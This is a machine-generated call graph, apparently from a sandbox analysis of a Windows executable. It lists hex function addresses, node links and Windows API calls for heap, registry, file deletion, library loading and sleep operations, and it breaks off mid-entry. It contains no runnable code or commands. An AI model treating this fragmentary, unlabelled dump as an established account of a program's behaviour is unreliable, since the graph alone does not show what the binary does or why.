5 API calls 8607->8608 8608->8598 8609 40c382 8611 403c40 5 API calls 8609->8611 8611->8603 8613 406c4c 6 API calls 8614 40c355 8613->8614 8614->8609 8682 4126a7 8614->8682 8617 409673 8616->8617 8622 40956d 8616->8622 8617->8483 8618 408b45 6 API calls 8618->8622 8619 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8619->8622 8620 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8620->8622 8621 402bab GetProcessHeap HeapFree 8621->8622 8622->8617 8622->8618 8622->8619 8622->8620 8622->8621 8624 4040bb 13 API calls 8623->8624 8632 4096a9 8624->8632 8625 40989f 8625->8488 8626 409896 8627 403f9e 5 API calls 8626->8627 8627->8625 8629 408b45 6 API calls 8629->8632 8630 402bab GetProcessHeap HeapFree 8630->8632 8631 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8631->8632 8632->8625 8632->8626 8632->8629 8632->8630 8632->8631 8881 4059d8 8632->8881 8634 4040bb 13 API calls 8633->8634 8641 4098c1 8634->8641 8635 4099fb 8635->8491 8636 4099f3 8637 403f9e 5 API calls 8636->8637 8637->8635 8638 402bab GetProcessHeap HeapFree 8638->8641 8639 4059d8 4 API calls 8639->8641 8640 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8640->8641 8641->8635 8641->8636 8641->8638 8641->8639 8641->8640 8643 4031e5 4 API calls 8642->8643 8644 406441 GetNativeSystemInfo 8643->8644 8644->8506 8646 4031e5 4 API calls 8645->8646 8647 40480a 8646->8647 8648 4031e5 4 API calls 8647->8648 8649 40484f 8647->8649 8651 40485d 8647->8651 8648->8647 8650 403c40 5 API calls 8649->8650 8650->8651 8651->8507 8651->8510 8653 4031e5 4 API calls 8652->8653 8654 40a435 8653->8654 8654->8524 8656 4031e5 4 API calls 8655->8656 8657 40a451 8656->8657 8657->8538 8659 4031e5 4 API calls 8658->8659 8660 40487c 8659->8660 8660->8609 8661 406c4c 8660->8661 8722 4068eb 8661->8722 8663 406e02 8663->8613 8664 406cab 8734 40469b 8664->8734 8665 406c6c 8665->8663 8665->8664 8731 406894 8665->8731 8672 406df1 8673 40469b 4 API calls 8672->8673 8673->8663 8674 406cef 8674->8672 8675 4031e5 4 API calls 8674->8675 8676 406d26 8675->8676 8676->8672 8677 40771e 6 API calls 8676->8677 8681 406d57 8677->8681 8678 406da2 8679 4031e5 4 API calls 8678->8679 8679->8672 8681->8678 8747 4068b0 8681->8747 8683 4126bb 8682->8683 8687 4126d1 8682->8687 8691 412840 8683->8691 8803 40488c 8683->8803 8687->8691 8809 407055 8687->8809 8688 412837 8689 403c40 5 API calls 8688->8689 8689->8691 8691->8609 8693 41281e 8694 4070ff 6 API calls 8693->8694 8694->8688 8695 407055 6 API calls 8696 412742 8695->8696 8696->8693 8697 40719a 6 API calls 8696->8697 8698 41276e 8697->8698 8699 412804 8698->8699 8825 406f4a 8698->8825 8853 4070ff 8699->8853 8702 41279a 8831 412553 8702->8831 8875 405907 8712->8875 8714 405907 4 API calls 8715 405a61 8714->8715 8715->8714 8716 405a76 8715->8716 8716->8537 8718 402b7c 2 API calls 8717->8718 8721 405a99 8718->8721 8719 405ade 8719->8556 8721->8719 8878 40595e 8721->8878 8750 4076a8 8722->8750 8724 406913 8725 406a61 8724->8725 8726 40771e 6 API calls 8724->8726 8725->8665 8730 406949 8726->8730 8727 40771e 6 API calls 8727->8730 8728 404678 4 API calls 8728->8730 8730->8725 8730->8727 8730->8728 8756 4046c2 8730->8756 8732 4031e5 4 API calls 8731->8732 8733 4068a6 8732->8733 8733->8665 8735 4046a4 8734->8735 8737 4046b4 8734->8737 8736 4031e5 4 API calls 8735->8736 8736->8737 8737->8663 8738 404678 8737->8738 8739 4031e5 4 API calls 8738->8739 8740 40468b 8739->8740 8740->8663 8741 40771e 8740->8741 8742 407748 8741->8742 8743 407737 8741->8743 8742->8674 8744 407644 6 API calls 8743->8744 8745 407741 8744->8745 8746 406baa 6 API calls 8745->8746 8746->8742 8748 4031e5 4 API calls 8747->8748 8749 4068c2 8748->8749 8749->8681 8751 4076c1 8750->8751 8753 4076d2 8750->8753 8764 407644 8751->8764 8753->8724 8757 4046d3 8756->8757 8758 4046d9 8756->8758 8799 40464c 8757->8799 8760 4046e9 8758->8760 8762 404678 4 API calls 8758->8762 8761 404714 8760->8761 8763 40469b 4 API calls 8760->8763 8761->8730 8762->8760 8763->8761 8765 407653 8764->8765 8766 407661 8764->8766 8765->8766 8772 406a6b 8765->8772 8768 406baa 8766->8768 8769 406bc8 8768->8769 8770 406bbb 8768->8770 8769->8753 8770->8769 8780 407402 8770->8780 8776 406a81 8772->8776 8773 402b7c 2 API calls 8773->8776 8774 406b8b 8774->8766 8775 406894 4 API calls 8775->8776 8776->8773 8776->8774 8776->8775 8777 406b96 8776->8777 8779 402bab 2 API calls 8776->8779 8778 402bab 2 API calls 8777->8778 8778->8774 8779->8776 8781 407644 6 API calls 8780->8781 8782 407412 8781->8782 8783 402b7c 2 API calls 8782->8783 8790 407450 8782->8790 8784 407483 8783->8784 8785 402b7c 2 API calls 8784->8785 8784->8790 8787 4074ce 8785->8787 8786 4074da 8788 4068cc 2 API calls 8786->8788 8787->8786 8789 402b7c 2 API calls 8787->8789 8788->8790 8793 40751f 8789->8793 8790->8769 8791 40752b 8792 4068cc 2 API calls 8791->8792 8792->8786 8793->8791 8795 4068cc 8793->8795 8796 4068d6 8795->8796 8797 4068e3 8795->8797 8796->8797 8798 402bab GetProcessHeap HeapFree 8796->8798 8797->8791 8798->8797 8800 404659 8799->8800 8802 404666 8799->8802 8801 4031e5 4 API calls 8800->8801 8801->8802 8802->8758 8804 4047e6 5 API calls 8803->8804 8805 404897 8804->8805 8806 40489c 8805->8806 8861 4047c7 8805->8861 8806->8687 8810 40706f 8809->8810 8811 407084 8809->8811 8810->8811 8812 407644 6 API calls 8810->8812 8816 4070e4 8811->8816 8864 406fd2 8811->8864 8813 40707d 8812->8813 8815 406baa 6 API calls 8813->8815 8815->8811 8816->8688 8817 40719a 8816->8817 8818 4071b0 8817->8818 8820 4071c5 8817->8820 8819 407644 6 API calls 8818->8819 8818->8820 8821 4071be 8819->8821 8823 406fd2 4 API calls 8820->8823 8824 407226 8820->8824 8822 406baa 6 API calls 8821->8822 8822->8820 8823->8824 8824->8693 8824->8695 8826 406f64 8825->8826 8829 406f75 8825->8829 8827 407644 6 API calls 8826->8827 8828 406f6e 8827->8828 8830 406baa 6 API calls 8828->8830 8829->8702 8830->8829 8872 4060ac 8831->8872 8854 407116 8853->8854 8856 40712b 8853->8856 8855 407644 6 API calls 8854->8855 8854->8856 8857 407124 8855->8857 8858 406fd2 4 API calls 8856->8858 8860 407187 8856->8860 8859 406baa 6 API calls 8857->8859 8858->8860 8859->8856 8860->8693 8862 4031e5 4 API calls 8861->8862 8863 4047d9 8862->8863 8863->8687 8865 406fde 8864->8865 8866 407027 8865->8866 8867 4031e5 4 API calls 8865->8867 8866->8816 8868 406ffa 8867->8868 8869 4031e5 4 API calls 8868->8869 8870 407011 8869->8870 8871 4031e5 4 API calls 8870->8871 8871->8866 8873 4031e5 4 API calls 8872->8873 8874 4060bb 8873->8874 8874->8874 8876 4031e5 4 API calls 8875->8876 8877 40591a 8876->8877 8877->8715 8879 4031e5 4 API calls 8878->8879 8880 405971 8879->8880 8880->8721 8882 4031e5 4 API calls 8881->8882 8883 4059ed 8882->8883 8884 402b7c 2 API calls 8883->8884 8887 405a38 8883->8887 8885 405a16 8884->8885 8886 4031e5 4 API calls 8885->8886 8885->8887 8886->8887 8887->8632 9749 40a349 9750 4098a7 14 API calls 9749->9750 9751 40a359 9750->9751 8966 408952 8987 40823f 8966->8987 8969 408960 8971 4056bf 2 API calls 8969->8971 8972 40896a 8971->8972 9015 408862 8972->9015 8974 413aca 4 API calls 8975 4089d4 8974->8975 8977 405695 2 API calls 8975->8977 8976 408975 8984 4089c4 8976->8984 9023 4087d6 8976->9023 8980 4089df 8977->8980 8984->8974 8985 402bab 2 API calls 8986 40899d 8985->8986 8986->8984 8986->8985 8988 40824d 8987->8988 8989 40831b 8988->8989 8990 4031e5 4 API calls 8988->8990 8989->8969 9003 4083bb 8989->9003 8991 40826d 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 408289 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4082a5 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4082c1 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4082e2 8998->8999 9000 4031e5 4 API calls 8999->9000 9001 4082ff 9000->9001 9002 4031e5 4 API calls 9001->9002 9002->8989 9051 408363 9003->9051 9006 4084ab 9006->8969 9007 4056bf 2 API calls 9008 4083f4 9007->9008 9009 408492 9008->9009 9054 40815d 9008->9054 9069 40805d 9008->9069 9010 413aca 4 API calls 9009->9010 9011 4084a0 9010->9011 9012 405695 2 API calls 9011->9012 9012->9006 9084 404b8f 9015->9084 9017 408946 9017->8976 9018 4031e5 4 API calls 9020 40887e 9018->9020 9019 40893e 9087 404a39 9019->9087 9020->9017 9020->9018 9020->9019 9022 402b7c 2 API calls 9020->9022 9022->9020 9024 402b7c 2 API calls 9023->9024 9025 4087e7 9024->9025 9026 4031e5 4 API calls 9025->9026 9030 40885a 9025->9030 9027 408802 9026->9027 9031 40884d 9027->9031 9034 408853 9027->9034 9096 408522 9027->9096 9100 4084b4 9027->9100 9028 402bab 2 API calls 9028->9030 9035 408749 9030->9035 9103 4084d4 9031->9103 9034->9028 9036 404b8f 5 API calls 9035->9036 9041 408765 9036->9041 9037 4031e5 4 API calls 9037->9041 9038 408522 4 API calls 9038->9041 9039 4087c7 9040 404a39 5 API calls 9039->9040 9042 4087cf 9040->9042 9041->9037 9041->9038 9041->9039 9041->9042 9043 4085d1 9042->9043 9044 4086c2 9043->9044 9049 4085e9 9043->9049 9044->8986 9046 402bab 2 API calls 9046->9049 9047 4031e5 4 API calls 9047->9049 9049->9044 9049->9046 9049->9047 9109 4089e6 9049->9109 9128 4086c9 9049->9128 9132 4036a3 9049->9132 9052 4031e5 4 API calls 9051->9052 9053 408386 9052->9053 9053->9006 9053->9007 9055 40816f 9054->9055 9056 4081b6 9055->9056 9057 4081fd 9055->9057 9068 4081ef 9055->9068 9059 405872 4 API calls 9056->9059 9058 405872 4 API calls 9057->9058 9060 408213 9058->9060 9061 4081cf 9059->9061 9062 405872 4 API calls 9060->9062 9063 405872 4 API calls 9061->9063 9064 408222 9062->9064 9065 4081df 9063->9065 9066 405872 4 API calls 9064->9066 9067 405872 4 API calls 9065->9067 9066->9068 9067->9068 9068->9008 9070 40808c 9069->9070 9071 4080d2 9070->9071 9072 408119 9070->9072 9083 40810b 9070->9083 9074 405872 4 API calls 9071->9074 9073 405872 4 API calls 9072->9073 9075 40812f 9073->9075 9076 4080eb 9074->9076 9077 405872 4 API calls 9075->9077 9078 405872 4 API calls 9076->9078 9079 40813e 9077->9079 9080 4080fb 9078->9080 9081 405872 4 API calls 9079->9081 9082 405872 4 API calls 9080->9082 9081->9083 9082->9083 9083->9008 9090 404a19 9084->9090 9086 404ba0 9086->9020 9093 4049ff 9087->9093 9089 404a44 9089->9017 9091 4031e5 4 API calls 9090->9091 9092 404a2c RegOpenKeyW 9091->9092 9092->9086 9094 4031e5 4 API calls 9093->9094 9095 404a12 RegCloseKey 9094->9095 9095->9089 9098 408534 9096->9098 9097 4085af 9097->9027 9098->9097 9106 4084ee 9098->9106 9101 4031e5 4 API calls 9100->9101 9102 4084c7 9101->9102 9102->9027 9104 4031e5 4 API calls 9103->9104 9105 4084e7 9104->9105 9105->9034 9107 4031e5 4 API calls 9106->9107 9108 408501 9107->9108 9108->9097 9110 4031e5 4 API calls 9109->9110 9111 408a06 9110->9111 9112 408b21 9111->9112 9113 4031e5 4 API calls 9111->9113 9112->9049 9116 408a32 9113->9116 9114 408b17 9144 403649 9114->9144 9116->9114 9135 403666 9116->9135 9120 4031e5 4 API calls 9121 408a88 9120->9121 9122 4031e5 4 API calls 9121->9122 9127 408b0e 9121->9127 9123 408ac4 9122->9123 9124 405b6f 6 API calls 9123->9124 9125 408aff 9124->9125 9125->9127 9138 408508 9125->9138 9141 40362f 9127->9141 9129 408744 9128->9129 9131 4086e2 9128->9131 9129->9049 9130 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9130->9131 9131->9129 9131->9130 9133 4031e5 4 API calls 9132->9133 9134 4036b5 9133->9134 9134->9049 9136 4031e5 4 API calls 9135->9136 9137 403679 9136->9137 9137->9120 9137->9127 9139 4031e5 4 API calls 9138->9139 9140 40851b 9139->9140 9140->9127 9142 4031e5 4 API calls 9141->9142 9143 403642 9142->9143 9143->9114 9145 4031e5 4 API calls 9144->9145 9146 40365c 9145->9146 9146->9112 9786 41045c 9787 4040bb 13 API calls 9786->9787 9788 410477 9787->9788 9789 41060b 9788->9789 9817 407851 9788->9817 9791 41048f 9792 407851 2 API calls 9791->9792 9798 410604 9791->9798 9794 4104a9 9792->9794 9793 403f9e 5 API calls 9793->9789 9799 4105e0 9794->9799 9800 405ae9 6 API calls 9794->9800 9802 4105eb 9794->9802 9803 41056f 9794->9803 9795 402bab 2 API calls 9797 4105fb 9795->9797 9796 402bab 2 API calls 9796->9798 9797->9796 9798->9793 9801 402bab 2 API calls 9799->9801 9799->9802 9800->9794 9801->9802 9802->9795 9802->9797 9803->9799 9804 4105d6 9803->9804 9806 412269 6 API calls 9803->9806 9805 402bab 2 API calls 9804->9805 9805->9799 9807 410580 9806->9807 9807->9804 9808 405872 4 API calls 9807->9808 9809 410599 9808->9809 9810 405872 4 API calls 9809->9810 9811 4105a9 9810->9811 9812 405872 4 API calls 9811->9812 9813 4105bb 9812->9813 9814 405872 4 API calls 9813->9814 9815 4105cd 9814->9815 9816 402bab 2 API calls 9815->9816 9816->9804 9818 407866 9817->9818 9819 402b7c 2 API calls 9818->9819 9820 407899 9818->9820 9819->9820 9820->9791 9208 40f561 9211 40f4b6 9208->9211 9212 413b28 7 API calls 9211->9212 9213 40f4bf 9212->9213 9214 405b6f 6 API calls 9213->9214 9215 413a58 14 API calls 9213->9215 9216 40f559 9213->9216 9217 402bab GetProcessHeap HeapFree 9213->9217 9214->9213 9215->9213 9217->9213 9221 403b64 9222 4031e5 4 API calls 9221->9222 9223 403b77 PathFileExistsW 9222->9223 9852 40d069 9853 404bee 7 API calls 9852->9853 9854 40d080 9853->9854 9855 404bee 7 API calls 9854->9855 9880 40d1e2 9854->9880 9856 40d099 9855->9856 9857 404bee 7 API calls 9856->9857 9858 40d0a7 9857->9858 9859 404ba7 4 API calls 9858->9859 9860 40d0b6 9859->9860 9861 404bee 7 API calls 9860->9861 9862 40d0c5 9861->9862 9863 404c4e 6 API calls 9862->9863 9864 40d0dc 9863->9864 9865 404bee 7 API calls 9864->9865 9866 40d0eb 9865->9866 9867 404ba7 4 API calls 9866->9867 9868 40d0fa 9867->9868 9869 404bee 7 API calls 9868->9869 9870 40d109 9869->9870 9871 404c4e 6 API calls 9870->9871 9872 40d123 9871->9872 9873 405872 4 API calls 9872->9873 9872->9880 9874 40d14a 9873->9874 9875 405872 4 API calls 9874->9875 9876 40d159 9875->9876 9877 405872 4 API calls 9876->9877 9878 40d16b 9877->9878 9879 405781 4 API calls 9878->9879 9881 40d179 9879->9881 9882 405872 4 API calls 9881->9882 9883 40d18b 9882->9883 9884 405762 4 API calls 9883->9884 9885 40d19f 9884->9885 9886 405872 4 API calls 9885->9886 9887 40d1b1 9886->9887 9888 405781 4 API calls 9887->9888 9889 40d1bf 9888->9889 9890 405872 4 API calls 9889->9890 9891 40d1d1 9890->9891 9892 405762 4 API calls 9891->9892 9892->9880 9247 40f16e 9248 4056bf 2 API calls 9247->9248 9249 40f17b 9248->9249 9250 412093 13 API calls 9249->9250 9251 40f19e 9250->9251 9252 412093 13 API calls 9251->9252 9253 40f1b6 9252->9253 9254 412093 13 API calls 9253->9254 9255 40f1cc 9254->9255 9256 412093 13 API calls 9255->9256 9257 40f1e2 9256->9257 9258 413aca 4 API calls 9257->9258 9259 40f1ef 9258->9259 9260 405695 2 API calls 9259->9260 9261 40f1fa 9260->9261 9262 40ce71 9263 413b28 7 API calls 9262->9263 9264 40ce78 9263->9264 9265 405b6f 6 API calls 9264->9265 9266 40ce83 9265->9266 9269 40ceba 9266->9269 9271 403d74 11 API calls 9266->9271 9275 40cec1 9266->9275 9267 403fbf 7 API calls 9268 40cecc 9267->9268 9270 403d74 11 API calls 9268->9270 9280 40cefb 9268->9280 9272 402bab 2 API calls 9269->9272 9273 40cee7 9270->9273 9274 40cead 9271->9274 9272->9275 9276 40cef4 9273->9276 9277 402bab 2 API calls 9273->9277 9274->9269 9279 402bab 2 API calls 9274->9279 9275->9267 9278 402bab 2 API calls 9276->9278 9277->9276 9278->9280 9279->9269 9281 406472 9282 4031e5 4 API calls 9281->9282 9283 406484 Sleep 9282->9283 9920 40ea77 9921 404bee 7 API calls 9920->9921 9922 40ea8e 9921->9922 9923 404bee 7 API calls 9922->9923 9931 40eb24 9922->9931 9924 40eaa7 9923->9924 9925 404bee 7 API calls 9924->9925 9926 40eab5 9925->9926 9927 404c4e 6 API calls 9926->9927 9928 40eacc 9927->9928 9929 405872 4 API calls 9928->9929 9928->9931 9930 40eaf2 9929->9930 9932 405872 4 API calls 9930->9932 9933 40eb01 9932->9933 9934 405872 4 API calls 9933->9934 9935 40eb13 9934->9935 9936 405762 4 API calls 9935->9936 9936->9931 9969 40f204 9970 405781 4 API calls 9969->9970 9971 40f214 9970->9971 9972 4057df 14 API calls 9971->9972 9973 40f226 9972->9973 9341 403c08 9342 4031e5 4 API calls 9341->9342 9343 403c1a DeleteFileW 9342->9343 9344 410a09 9345 41219c 15 API calls 9344->9345 9346 410a1b 9345->9346 9347 41219c 15 API calls 9346->9347 9348 410a23 9347->9348 9349 41219c 15 API calls 9348->9349 9350 410a2c 9349->9350 9351 41219c 15 API calls 9350->9351 9352 410a38 9351->9352 9353 404b22 7 API calls 9352->9353 9354 410a4c 9353->9354 9355 403fbf 7 API calls 9354->9355 9360 410a7a 9354->9360 9356 410a5c 9355->9356 9357 413a58 14 API calls 9356->9357 9362 410a71 9356->9362 9359 410a6b 9357->9359 9358 402bab 2 API calls 9358->9360 9361 402bab 2 API calls 9359->9361 9361->9362 9362->9358 9974 410d09 9975 410d56 9974->9975 9976 410d17 9974->9976 9978 413a58 14 API calls 9975->9978 9990 406642 9976->9990 9980 410d6f 9978->9980 9981 4056bf 2 API calls 9982 410d2e 9981->9982 10003 405641 9982->10003 9984 410d41 9985 413aca 4 API calls 9984->9985 9986 410d4a 9985->9986 9987 405695 2 API calls 9986->9987 9988 410d50 9987->9988 9989 4036a3 4 API calls 9988->9989 9989->9975 9991 406662 9990->9991 9992 4031e5 4 API calls 9991->9992 9993 406676 9992->9993 10007 4066bf 9993->10007 9998 4066b1 10001 4036a3 4 API calls 9998->10001 9999 4066a7 10000 4036a3 4 API calls 9999->10000 10002 4066ac 10000->10002 10001->10002 10002->9975 10002->9981 10004 40564d 10003->10004 10006 405673 10003->10006 10005 4056fc 4 API calls 10004->10005 10004->10006 10005->10006 10006->9984 10008 4031e5 4 API calls 10007->10008 10009 4066dc 10008->10009 10010 4066f6 SetLastError 10009->10010 10011 406708 GetLastError 10009->10011 10012 406693 10010->10012 10011->10012 10013 406713 10011->10013 10029 406455 10012->10029 10014 4031e5 4 API calls 10013->10014 10015 406725 10014->10015 10015->10012 10016 4031e5 4 API calls 10015->10016 10017 40673f 10016->10017 10018 406753 10017->10018 10019 406749 10017->10019 10021 4031e5 4 API calls 10018->10021 10020 4036a3 4 API calls 10019->10020 10020->10012 10022 406761 10021->10022 10023 40678a 10022->10023 10024 40677c 10022->10024 10026 4036a3 4 API calls 10023->10026 10025 4036a3 4 API calls 10024->10025 10027 406781 10025->10027 10026->10012 10028 4036a3 4 API calls 10027->10028 10028->10012 10030 4031e5 4 API calls 10029->10030 10031 406468 10030->10031 10031->9998 10031->9999 9363 40c509 9364 412093 13 API calls 9363->9364 9365 40c51e 9364->9365 9372 40910d 9373 404b22 7 API calls 9372->9373 9374 409124 9373->9374 9375 40917a 9374->9375 9376 405b6f 6 API calls 9374->9376 9377 40913e 9376->9377 9379 404b22 7 API calls 9377->9379 9384 409173 9377->9384 9378 402bab 2 API calls 9378->9375 9380 409153 9379->9380 9381 409408 18 API calls 9380->9381 9386 40916a 9380->9386 9383 409164 9381->9383 9382 402bab 2 API calls 9382->9384 9385 402bab 2 API calls 9383->9385 9384->9378 9385->9386 9386->9382 9390 410410 9391 4056bf 2 API calls 9390->9391 9392 41041b 9391->9392 9393 412093 13 API calls 9392->9393 9394 41043c 9393->9394 9395 413aca 4 API calls 9394->9395 9396 410449 9395->9396 9397 405695 2 API calls 9396->9397 9398 410454 9397->9398 9425 40c71a 9426 41219c 15 API calls 9425->9426 9427 40c728 9426->9427 10087 410b1a 10088 404bee 7 API calls 10087->10088 10089 410b31 10088->10089 10090 404bee 7 API calls 10089->10090 10100 410c6d 10089->10100 10091 410b5a 10090->10091 10092 404bee 7 API calls 10091->10092 10093 410b69 10092->10093 10094 404bee 7 API calls 10093->10094 10095 410b78 10094->10095 10096 404ba7 4 API calls 10095->10096 10097 410b86 10096->10097 10098 404ba7 4 API calls 10097->10098 10099 410b95 10098->10099 10099->10100 10101 405872 4 API calls 10099->10101 10102 410bd7 10101->10102 10103 405872 4 API calls 10102->10103 10104 410be8 10103->10104 10105 405872 4 API calls 10104->10105 10106 410bf9 10105->10106 10107 405781 4 API calls 10106->10107 10108 410c07 10107->10108 10109 405781 4 API calls 10108->10109 10113 410c15 10109->10113 10110 410c4e 10111 405762 4 API calls 10110->10111 10112 410c60 10111->10112 10112->10100 10114 403f9e 5 API calls 10112->10114 10113->10110 10120 405e5a 10113->10120 10114->10100 10117 4040bb 13 API calls 10118 410c44 10117->10118 10119 402bab 2 API calls 10118->10119 10119->10110 10121 402b7c 2 API calls 10120->10121 10122 405e72 10121->10122 10123 4031e5 4 API calls 10122->10123 10126 405ea3 10122->10126 10124 405e94 10123->10124 10125 402bab 2 API calls 10124->10125 10124->10126 10125->10126 10126->10110 10126->10117 10127 40f81c 10128 404bee 7 API calls 10127->10128 10130 40f833 10128->10130 10129 40f94f 10130->10129 10131 404bee 7 API calls 10130->10131 10132 40f85c 10131->10132 10133 404bee 7 API calls 10132->10133 10134 40f86b 10133->10134 10135 404bee 7 API calls 10134->10135 10136 40f87a 10135->10136 10137 404bee 7 API calls 10136->10137 10138 40f888 10137->10138 10139 404ba7 4 API calls 10138->10139 10140 40f897 10139->10140 10140->10129 10141 405872 4 API calls 10140->10141 10142 40f8d8 10141->10142 10143 405872 4 API calls 10142->10143 10144 40f8ea 10143->10144 10145 405872 4 API calls 10144->10145 10146 40f8fa 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f90c 10147->10148 10149 405781 4 API calls 10148->10149 10150 40f91d 10149->10150 10151 4040bb 13 API calls 10150->10151 10152 40f92d 10151->10152 10153 405762 4 API calls 10152->10153 10154 40f93f 10153->10154 10154->10129 10155 403f9e 5 API calls 10154->10155 10155->10129 9440 402c1f 9441 4031e5 4 API calls 9440->9441 9442 402c31 LoadLibraryW 9441->9442 10165 407e1f 10166 407e2c 10165->10166 10170 407e61 10165->10170 10167 407e3e 10166->10167 10171 402bab 2 API calls 10166->10171 10174 407e51 10166->10174 10168 407ed4 10167->10168 10175 402bab 2 API calls 10167->10175 10169 407eb6 10173 402bab 2 API calls 10169->10173 10169->10174 10170->10169 10176 405872 4 API calls 10170->10176 10182 407ea6 10170->10182 10171->10167 10172 402bab 2 API calls 10172->10169 10173->10174 10174->10168 10177 402bab 2 API calls 10174->10177 10175->10174 10178 407e86 10176->10178 10177->10168 10179 405872 4 API calls 10178->10179 10180 407e96 10179->10180 10181 405872 4 API calls 10180->10181 10181->10182 10182->10169 10182->10172 10183 40fa23 10184 40fa39 10183->10184 10185 410293 10184->10185 10186 405b6f 6 API calls 10184->10186 10187 40ffcc 10186->10187 10187->10185 10188 4040bb 13 API calls 10187->10188 10189 40ffeb 10188->10189 10190 41028c 10189->10190 10192 402b7c 2 API calls 10189->10192 10238 41027d 10189->10238 10191 402bab 2 API calls 10190->10191 10191->10185 10194 41001e 10192->10194 10193 403f9e 5 API calls 10193->10190 10195 40a423 4 API calls 10194->10195 10194->10238 10196 41004a 10195->10196 10197 4031e5 4 API calls 10196->10197 10198 41005c 10197->10198 10199 4031e5 4 API calls 10198->10199 10200 410079 10199->10200 10201 4031e5 4 API calls 10200->10201 10202 410096 10201->10202 10203 4031e5 4 API calls 10202->10203 10204 4100b0 10203->10204 10205 4031e5 4 API calls 10204->10205 10206 4100cd 10205->10206 10207 4031e5 4 API calls 10206->10207 10208 4100ea 10207->10208 10239 412516 10208->10239 10210 4100fd 10211 40642c 5 API calls 10210->10211 10212 41013e 10211->10212 10213 410142 10212->10213 10214 41019f 10212->10214 10215 40488c 5 API calls 10213->10215 10217 4031e5 4 API calls 10214->10217 10216 410151 10215->10216 10218 41019c 10216->10218 10219 404866 4 API calls 10216->10219 10230 4101bb 10217->10230 10220 41022a 10218->10220 10222 40642c 5 API calls 10218->10222 10221 410163 10219->10221 10226 413a58 14 API calls 10220->10226 10223 41018e 10221->10223 10225 406c4c 6 API calls 10221->10225 10224 410201 10222->10224 10227 403c40 5 API calls 10223->10227 10228 410205 10224->10228 10229 41022f 10224->10229 10231 410178 10225->10231 10232 41026e 10226->10232 10227->10218 10233 4126a7 7 API calls 10228->10233 10242 4125db 10229->10242 10235 4031e5 4 API calls 10230->10235 10236 406c4c 6 API calls 10231->10236 10237 402bab 2 API calls 10232->10237 10233->10220 10235->10218 10236->10223 10237->10238 10238->10193 10240 4031e5 4 API calls 10239->10240 10241 412539 10240->10241 10241->10210 10243 40488c 5 API calls 10242->10243 10244 4125ec 10243->10244 10245 41269f 10244->10245 10246 4031e5 4 API calls 10244->10246 10245->10220 10247 412609 10246->10247 10248 4031e5 4 API calls 10247->10248 10253 41268f 10247->10253 10250 41262a 10248->10250 10249 403c40 5 API calls 10249->10245 10258 412675 10250->10258 10259 4124f1 10250->10259 10251 4031e5 4 API calls 10251->10253 10253->10249 10255 412663 10257 4031e5 4 API calls 10255->10257 10256 4124f1 4 API calls 10256->10255 10257->10258 10258->10251 10260 4031e5 4 API calls 10259->10260 10261 412503 10260->10261 10261->10255 10261->10256 10273 410927 10274 4044ee 8 API calls 10273->10274 10275 41093d 10274->10275 10276 4109a4 10275->10276 10277 4056bf 2 API calls 10275->10277 10280 410954 10277->10280 10278 4044ee 8 API calls 10278->10280 10280->10278 10281 410990 10280->10281 10282 402bab 2 API calls 10280->10282 10288 41080e 10280->10288 10283 413aca 4 API calls 10281->10283 10282->10280 10284 410998 10283->10284 10285 405695 2 API calls 10284->10285 10286 41099e 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10276 10289 410821 10288->10289 10299 41091f 10289->10299 10300 410701 10289->10300 10292 405872 4 API calls 10293 410900 10292->10293 10294 405872 4 API calls 10293->10294 10295 41090d 10294->10295 10296 405872 4 API calls 10295->10296 10297 410919 10296->10297 10298 402bab 2 API calls 10297->10298 10298->10299 10299->10280 10301 405f08 4 API calls 10300->10301 10303 410713 10301->10303 10302 410804 10302->10292 10302->10299 10303->10302 10304 402b7c 2 API calls 10303->10304 10306 410748 10304->10306 10305 402bab 2 API calls 10305->10302 10307 402b7c 2 API calls 10306->10307 10309 4107fd 10306->10309 10310 4107ad 10307->10310 10308 402bab 2 API calls 10308->10309 10309->10305 10310->10308 9510 40f12f 9511 41219c 15 API calls 9510->9511 9512 40f13f 9511->9512 9513 41219c 15 API calls 9512->9513 9514 40f14c 9513->9514 9515 41219c 15 API calls 9514->9515 9516 40f159 9515->9516 9517 41219c 15 API calls 9516->9517 9518 40f166 9517->9518 9525 40ed35 9526 4056bf 2 API calls 9525->9526 9527 40ed42 9526->9527 9528 412093 13 API calls 9527->9528 9529 40ed63 9528->9529 9530 412093 13 API calls 9529->9530 9531 40ed73 9530->9531 9532 413aca 4 API calls 9531->9532 9533 40ed80 9532->9533 9534 405695 2 API calls 9533->9534 9535 40ed8e 9534->9535 8064 40f3c5 8069 41219c 8064->8069 8067 41219c 15 API calls 8068 40f3e1 8067->8068 8070 4121b1 8069->8070 8086 40f3d3 8069->8086 8071 4121be 8070->8071 8074 4121c5 8070->8074 8118 413ba4 8071->8118 8073 4121ca 8087 404056 8073->8087 8074->8073 8080 412210 8074->8080 8076 4121c3 8076->8086 8095 405b6f 8076->8095 8079 41224d 8083 402bab 2 API calls 8079->8083 8079->8086 8080->8086 8123 403fbf 8080->8123 8083->8086 8086->8067 8134 402b7c GetProcessHeap RtlAllocateHeap 8087->8134 8089 404066 8092 404095 8089->8092 8136 4031e5 8089->8136 8092->8076 8093 404099 8094 402bab 2 API calls 8093->8094 8094->8092 8096 405b7d 8095->8096 8097 402b7c 2 API calls 8096->8097 8098 405b99 8097->8098 8107 405c02 8098->8107 8172 4059b8 8098->8172 8100 405bba 8101 405c09 8100->8101 8103 402b7c 2 API calls 8100->8103 8102 402bab 2 API calls 8101->8102 8102->8107 8104 405bdd 8103->8104 8104->8101 8105 405be4 8104->8105 8106 402bab 2 API calls 8105->8106 8106->8107 8107->8079 8108 413a58 8107->8108 8109 413a63 8108->8109 8117 412245 8108->8117 8109->8117 8175 405781 8109->8175 8112 405781 4 API calls 8113 413aa0 8112->8113 8178 4057df 8113->8178 8116 405781 4 API calls 8116->8117 8131 402bab 8117->8131 8119 413bad 8118->8119 8120 404056 7 API calls 8119->8120 8122 413bb8 8119->8122 8121 413bc5 8120->8121 8121->8076 8122->8076 8124 